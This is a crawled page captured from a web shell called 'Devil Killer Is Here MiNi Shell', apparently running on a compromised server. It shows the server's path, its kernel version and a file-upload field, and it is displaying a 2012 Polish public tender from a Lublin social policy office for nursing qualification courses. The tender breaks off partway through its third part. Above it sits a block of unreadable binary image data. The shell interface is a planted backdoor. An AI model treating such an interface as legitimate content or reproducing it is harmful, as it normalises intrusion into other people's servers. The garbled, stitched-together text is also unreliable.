JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121228/273101-N-2012.html

<p class="kh_header"><b>Lublin: Przygotowanie i przeprowadzenie kursu kwalifikacyjnego pielęgniarstwa [DSP.WW.44.2012]</b><br>
<b>Numer ogłoszenia: 273101 - 2012; data zamieszczenia: 28.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej , ul. Tomasza Zana 38, 20-601 Lublin, woj. lubelskie, tel. 81 528 76 50, faks 81 528 76 30.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rops.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i przeprowadzenie kursu kwalifikacyjnego pielęgniarstwa [DSP.WW.44.2012].</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przygotowanie i przeprowadzenie kursu kwalifikacyjnego pielęgniarstwa zgodnie z  ustawą z dnia 15 lipca 2011 r. o zawodach pielęgniarki i położnej (Dz. U. Nr 174 , poz. 1038) i SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy usługi zamówień uzupełniających, stanowiących nie więcej niż 20 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.56.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymagania wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia może być zgodnie z art. 75 ustawy o zawodach pielęgniarki i położnej prowadzona przez: uczelnie, szkoły prowadzące działalność dydaktyczną i badawczą w dziedzinie nauk medycznych oraz podmioty lecznicze; inne podmioty po uzyskaniu wpisu do właściwego rejestru podmiotów prowadzących kształcenie podyplomowe</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełni powyższy warunek, jeśli wykaże się wykonaniem należycie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwóch kursów kwalifikacyjnych dla pielęgniarek, w których wzięło minimum 10 osób
w każdym</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w zakresie tego warunku nie określa swoich wymagań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w zakresie tego warunku nie określa swoich wymagań</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w zakresie tego warunku nie określa swoich wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie Wykonawcy w prowadzeniu kursów kwalifikacyjnych - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki dokonania zmiany umowy:
1)	Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu umowy.
2)	Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie umowy.
3)	Za zgodą Zamawiającego zmiana wykładowcy wynikająca z ważnych przyczyn, które nie mogły być wcześniej przewidziane, z zastrzeżeniem, że proponowana przez Wykonawcę w zastępstwo osoba będzie posiadała wymagane w SIWZ wykształcenie, kwalifikacje i doświadczeni zawodowe.
4)	Konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych przez strony nie może spowodować zmiany ceny wynikającej z oferty, na podstawie której był dokonany wybór Wykonawcy.
5)	Zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://rops.bip.lublin.pl/index.php?id=54<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> REGIONALNY OŚRODEK POLITYKI SPOŁECZNEJ w Lublinie 
20-601 Lublin, ul. Zana 38
Nr faksu (81) 528 76 30
Adres e-mail: lukasz.wrobel@lubelskie.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.01.2013 godzina 12:00, miejsce: REGIONALNY OŚRODEK POLITYKI SPOŁECZNEJ w Lublinie
20-601 Lublin, ul. Zana 38
Pok. 610.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs kwalifikacyjny pielęgniarstwa rodzinnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakładana liczba uczestników: 10.
Miejsce kształcenia: Lublin.
Zakładany okres kształcenia: styczeń - sierpień 2013 r.
Łączną liczba godzin: 488 godzin dydaktycznych, w tym:
- blok ogólnozawodowy - 135 godzin
- blok specjalistyczny - 353 godzin, w tym
- część teoretyczna - 150 godzin
- część praktyczna - 203 godzin

Plan nauczania określony został dla dziennego trybu kształcenia i zawiera liczbę godzin przeznaczoną na realizację poszczególnych modułów. Z uwagi jednak na lokalne preferencje i potrzeby, prowadzący zajęcia w porozumieniu z kierownikiem kursu mogą dokonać modyfikacji czasu kształcenia w wymiarze nie większym niż 20%. Oznacza to, że 80% czasu przeznaczonego na realizację poszczególnych modułów nie podlega zmianie. Wskazane 20% może być wykorzystane na przesunięcia pomiędzy poszczególnymi modułami lub w części może zostać przeznaczone na realizację zadań w ramach samokształcenia. Organizator, w porozumieniu z kierownikiem kursu oraz wykładowcami, ma prawo do modyfikacji czasu trwania kształcenia w zależności od programu realizowanego w trybie innym niż dzienny.

Sposób organizacji
Za przebieg i organizację kursu kwalifikacyjnego odpowiedzialny jest organizator kształcenia.
Planując realizację kursu organizator powinien:
1.	Opracować program kształcenia.
2.	Opracować regulamin organizacyjny kursu, który w szczególności określa:
a)	organizację kursu, 
b)	zasady i sposób naboru osób,
c)	prawa i obowiązki osób uczestniczących w kursie, 
d)	zakres obowiązków wykładowców i innych osób prowadzących nauczanie teoretyczne
i szkolenie praktyczne,
e)	zasady przeprowadzenia egzaminu.
3.	Powołać kierownika kursu kwalifikacyjnego;
Do zadań kierownika kursu oprócz zadań określonych w rozporządzeniu wydanym na podstawie art. 10u, ustawy z dnia 22 maja 2003 r. o zmianie ustawy o zawodach pielęgniarki
i położnej oraz ustawy zmieniającej ustawę o zawodach pielęgniarki i położnej (Dz. U. Nr 109, poz.1029) powinno należeć:
a)	współdecydowanie o doborze kadry dydaktycznej,
b)	przedstawienie uczestnikom kursu: celu, programu i organizacji kursu,
c)	ocenianie placówek szkolenia praktycznego wg specyfiki i organizacji zajęć,
d)	pomaganie w rozwiązywaniu problemów,
e)	udzielanie indywidualnych konsultacji uczestnikom kursu,
f)	zbieranie i analizowanie opinii o przebiegu kursu,
g)	zaliczanie kursu i dokonanie wpisu w karcie kursu kwalifikacyjnego.
W dniu rozpoczęcia kursu każdy uczestnik powinien otrzymać:
a)	harmonogram zajęć teoretycznych i praktycznych,
b)	wykaz umiejętności będących przedmiotem kształcenia,
c)	kartę kursu kwalifikacyjnego, która z wymaganymi wpisami i zaliczeniami, stanowi dowód ich odbycia.
4.	Powołać komisję kwalifikacyjną.
5.	Powołać w uzgodnieniu z kierownikiem kursu opiekunów szkolenia praktycznego, którzy powinni być merytorycznymi pracownikami placówek, w których odbywa się szkolenie praktyczne.
6.	Wskazać kadrę dydaktyczną posiadającą kwalifikacje określone w programie ramowym.
7.	Zapewnić bazę dydaktyczną dostosowaną do liczby uczestników kursu kwalifikacyjnego:
a)	sale wykładowe,
b)	sale warsztatowe,
c)	pomieszczenia wyposażone w specjalistyczny sprzęt i aparaturę,
d)	pracownie informatyczne.
8.	Zapewnić, w odniesieniu do poszczególnych modułów, środki dydaktyczne oraz formy zajęć, ze szczególnym uwzględnieniem form aktywizujących.
9.	Uwzględnić literaturę do poszczególnych modułów uwzględniając kryterium aktualności i adekwatności doboru do treści nauczania.
10.	Dobrać placówki stażowe zgodnie z planem nauczania, w których możliwe będzie zdobywanie umiejętności niezbędnych do wykonywania określonych świadczeń zdrowotnych.
11.	Posiadać wewnętrzny system monitorowania jakości kształcenia.
Sposób sprawdzania efektów nauczania
W toku realizacji programu kształcenia należy prowadzić ocenianie:
1.	Bieżące - rozumiane jako zaliczanie poszczególnych modułów (sprawdzenie stopnia opanowania wiedzy i umiejętności będących przedmiotem nauczania teoretycznego i praktycznego, w tym świadczeń zdrowotnych przewidzianych w programie kształcenia). Warunki zaliczania ustala wykładowca/opiekun szkolenia praktycznego w porozumieniu
z kierownikiem kursu kwalifikacyjnego.
2.	Końcowe - egzamin teoretyczny lub praktyczny przeprowadzony przez komisję egzaminacyjną powołaną przez organizatora kształcenia podyplomowego.

	KWALIFIKACJE KADRY DYDAKTYCZNEJ
	Organizator kształcenia zapewnia w przedmiotowej dziedzinie kształcenia wykładowców posiadających:
tytuł naukowy profesora,
stopień naukowy doktora habilitowanego,
stopień naukowy doktora, a ponadto wykładowcami mogą być osoby mające nie mniej niż pięcioletni staż zawodowy w dziedzinie będącej przedmiotem kształcenia, doświadczenie dydaktyczne oraz spełniają, co najmniej jeden z warunków:
posiadają tytuł zawodowy magistra pielęgniarstwa,
posiadają tytuł specjalisty w dziedzinie pielęgniarstwa rodzinnego lub w dziedzinie pokrewnej,
posiadają specjalizację lekarską w dziedzinie medycyny odpowiadającą dziedzinie pielęgniarstwa będącej przedmiotem kursu,
posiadają wykształcenie wyższe mające zastosowanie w ochronie zdrowia i/lub inne kwalifikacje niezbędne do realizacji wybranych zagadnień.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.56.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie Wykonawcy w prowadzeniu kursów kwalifikacyjnych - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs kwalifikacyjny pielęgniarstwa psychiatrycznego [Miejsce kształcenia Lublin].</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakładana liczba uczestników: 20 osób.
Zakładany okres kształcenia: styczeń - sierpień 2013 r.
Łączną liczba godzin: 485 godzin dydaktycznych, w tym:
- blok ogólnozawodowy - 135 godzin
- blok specjalistyczny - 350 godzin, w tym
- część teoretyczna - 105 godzin
- część praktyczna - 245 godzin
Plan nauczania określony został dla dziennego trybu kształcenia i zawiera liczbę godzin przeznaczoną na realizację poszczególnych modułów. Z uwagi jednak na lokalne preferencje i potrzeby, prowadzący zajęcia w porozumieniu z kierownikiem kursu mogą dokonać modyfikacji czasu kształcenia w wymiarze nie większym niż 20%. Oznacza to, że 80% czasu  przeznaczonego na realizację poszczególnych modułów nie podlega zmianie. Wskazane 20% może być wykorzystane na przesunięcia pomiędzy poszczególnymi modułami lub
w części może zostać przeznaczone na realizację zadań w ramach samokształcenia. Organizator, w porozumieniu z kierownikiem kursu oraz wykładowcami, ma prawo do modyfikacji czasu trwania kształcenia w zależności od programu realizowanego w trybie innym niż dzienny.

Sposób organizacji
Za przebieg i organizację kursu kwalifikacyjnego odpowiedzialny jest organizator kształcenia.
Planując realizację kursu organizator powinien:
1.	Opracować program kształcenia.
2.	Opracować regulamin organizacyjny kursu, który w szczególności określa:
a)	organizację kursu, 
b)	zasady i sposób naboru osób,
c)	prawa i obowiązki osób uczestniczących w kursie, 
d)	zakres obowiązków wykładowców i innych osób prowadzących nauczanie teoretyczne i szkolenie praktyczne,
e)	zasady przeprowadzenia egzaminu.
3.	Powołać kierownika kursu kwalifikacyjnego;
Do zadań kierownika kursu oprócz zadań określonych w rozporządzeniu wydanym na podstawie art. 10u, ustawy z dnia 22 maja 2003r. o zmianie ustawy o zawodach pielęgniarki i położnej oraz ustawy zmieniającej ustawę o zawodach pielęgniarki i położnej (Dz. U. Nr 109, poz.1029) powinno należeć:
a)	współdecydowanie o doborze kadry dydaktycznej,
b)	przedstawienie uczestnikom kursu: celu, programu i organizacji kursu,
c)	ocenianie placówek szkolenia praktycznego wg specyfiki i organizacji zajęć,
d)	pomaganie w rozwiązywaniu problemów,
e)	udzielanie indywidualnych konsultacji uczestnikom kursu,
f)	zbieranie i analizowanie opinii o przebiegu kursu,
g)	zaliczanie kursu i dokonanie wpisu w karcie kursu kwalifikacyjnego.
W dniu rozpoczęcia kursu każdy uczestnik powinien otrzymać:
a)	harmonogram zajęć teoretycznych i praktycznych,
b)	wykaz umiejętności będących przedmiotem kształcenia,
c)	kartę kursu kwalifikacyjnego, która z wymaganymi wpisami i zaliczeniami, stanowi dowód ich odbycia.
4.	Powołać komisję kwalifikacyjną.
5.	Powołać w uzgodnieniu z kierownikiem kursu opiekunów szkolenia praktycznego, którzy powinni być merytorycznymi pracownikami placówek, w których odbywa się szkolenie praktyczne.
Do zadań opiekuna szkolenia praktycznego należy:
a)	instruktaż wstępny (zapoznanie z celem szkolenia praktycznego, z organizacją pracy, wyposażeniem placówki, jego personelem, zakresem udzielanych świadczeń i in.),
b)	instruktaż bieżący (organizacja i prowadzenie zajęć, kontrola nad ich prawidłowym przebiegiem, pomoc w rozwiązywaniu problemów i in.),
c)	instruktaż końcowy (omówienie i podsumowanie zajęć, zaliczenie świadczeń
zdrowotnych określonych w programie kształcenia, ocena uzyskanych wiadomości
i umiejętności).
6.	Wskazać kadrę dydaktyczną posiadającą kwalifikacje określone w programie ramowym.
7.	Zapewnić bazę dydaktyczną dostosowaną do liczby uczestników kursu kwalifikacyjnego:
a)	sale wykładowe,
b)	sale warsztatowe,
c)	pomieszczenia wyposażone w specjalistyczny sprzęt i aparaturę,
d)	pracownie informatyczne.
8.	Zaprojektować, w odniesieniu do poszczególnych modułów, środki dydaktyczne oraz formy zajęć, ze szczególnym uwzględnieniem form aktywizujących.
9.	Zaprojektować literaturę do poszczególnych modułów uwzględniając kryterium aktualności i adekwatności doboru do treści nauczania.
10.	Dobrać placówki stażowe zgodnie z planem nauczania, w których możliwe będzie zdobywanie umiejętności niezbędnych do wykonywania określonych świadczeń zdrowotnych.
11.	Posiadać wewnętrzny system monitorowania jakości kształcenia.

Sposób sprawdzania efektów nauczania
W toku realizacji programu kształcenia należy prowadzić ocenianie: 
1.	Bieżące - rozumiane jako zaliczanie poszczególnych modułów (sprawdzenie stopnia opanowania wiedzy i umiejętności będących przedmiotem nauczania teoretycznego i praktycznego, w tym świadczeń zdrowotnych przewidzianych w programie kształcenia). Warunki zaliczania ustala wykładowca/opiekun szkolenia praktycznego w porozumieniu z kierownikiem kursu kwalifikacyjnego.
2.	Końcowe - egzamin teoretyczny lub praktyczny przeprowadzony przez komisję egzaminacyjną powołaną przez organizatora kształcenia podyplomowego.

	KWALIFIKACJE KADRY DYDAKTYCZNEJ
	Organizator kształcenia zapewnia w przedmiotowej dziedzinie kształcenia wykładowców posiadających:
tytuł naukowy profesora,
stopień naukowy doktora habilitowanego,
stopień naukowy doktora, a ponadto wykładowcami mogą być osoby mające nie mniej niż pięcioletni staż zawodowy w dziedzinie będącej przedmiotem kształcenia, doświadczenie dydaktyczne oraz spełniają, co najmniej jeden z warunków:
posiadają tytuł zawodowy magistra pielęgniarstwa,
posiadają tytuł specjalisty w dziedzinie pielęgniarstwa psychiatrycznego, 
posiadają specjalizację lekarską w dziedzinie medycyny odpowiadającą dziedzinie pielęgniarstwa będącej przedmiotem kursu,
posiadają wykształcenie wyższe mające zastosowanie w ochronie zdrowia i/lub inne kwalifikacje niezbędne do realizacji wybranych zagadnień.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.56.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie Wykonawcy w prowadzeniu kursów kwalifikacyjnych - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs kwalifikacyjny pielęgniarstwa psychiatrycznego 
[Miejsce kształcenia Biała Podlaska].</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakładana liczba uczestników: 16 osób.
Zakładany okres kształcenia: styczeń - sierpień 2013 r.
Łączną liczba godzin: 485 godzin dydaktycznych, w tym:
- blok ogólnozawodowy - 135 godzin
- blok specjalistyczny - 350 godzin, w tym
- część teoretyczna - 105 godzin
- część praktyczna - 245 godzin
Plan nauczania określony został dla dziennego trybu kształcenia i zawiera liczbę godzin przeznaczoną na realizację poszczególnych modułów. Z uwagi jednak na lokalne preferencje i potrzeby, prowadzący zajęcia w porozumieniu z kierownikiem kursu mogą dokonać modyfikacji czasu kształcenia w wymiarze nie większym niż 20%. Oznacza to, że 80% czasu 
przeznaczonego na realizację poszczególnych modułów nie podlega zmianie. Wskazane 20% może być wykorzystane na przesunięcia pomiędzy poszczególnymi modułami lub
w części może zostać przeznaczone na realizację zadań w ramach samokształcenia. Organizator, w porozumieniu z kierownikiem kursu oraz wykładowcami, ma prawo do modyfikacji czasu trwania kształcenia w zależności od programu realizowanego w trybie innym niż dzienny.

Sposób organizacji
Za przebieg i organizację kursu kwalifikacyjnego odpowiedzialny jest organizator kształcenia.
Planując realizację kursu organizator powinien:
1.	Opracować program kształcenia.
2.	Opracować regulamin organizacyjny kursu, który w szczególności określa:
a)	organizację kursu, 
b)	zasady i sposób naboru osób,
c)	prawa i obowiązki osób uczestniczących w kursie, 
d)	zakres obowiązków wykładowców i innych osób prowadzących nauczanie teoretyczne
i szkolenie praktyczne,
e)	zasady przeprowadzenia egzaminu.
3.	Powołać kierownika kursu kwalifikacyjnego;
